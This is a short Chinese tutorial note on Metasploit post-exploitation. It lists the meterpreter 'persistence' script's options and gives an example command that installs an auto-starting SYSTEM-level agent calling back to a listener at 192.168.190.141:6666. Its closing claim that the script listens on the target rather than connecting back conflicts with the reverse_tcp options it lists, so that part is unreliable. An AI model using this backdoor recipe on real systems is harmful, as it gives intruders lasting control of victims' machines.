后渗透阶段的简单笔记….TBC
使用方法:
meterpreter > run [模块名称]
meterpreter > run persistence -h
OPTIONS:
-A #自动启动一个匹配的exploit / multi / handler来连接到代理
-L #如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P #有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S #作为服务自动启动代理程序(具有SYSTEM权限)
-T #要使用的备用可执行模板
-U #用户登录时自动启动代理
-X #系统引导时自动启动代理程序
-h #这个帮助菜单
-i #每次连接尝试之间的时间间隔(秒)
-p #运行Metasploit的系统正在侦听的端口
-r #运行Metasploit监听连接的系统的IP
例子:run persistence -S -U -X -i 5 -p 6666 -r 192.168.190.141
注意,这个脚本生成的木马 貌似/好像/大概/也许 是一个16位的程序…最高也只能在32位系统里运行,
对于64位系统,可以自行再生成一个msf木马upload到靶机上去,一般情况下,其木马所在位置会在执行这个脚本时输出
emmm,我不是很推荐用这个,这个脚本不是反向连接的,会在目标机上监听一个端口,随便一个谁去连接都是直接拿到权限,包括各种安全扫描工具…..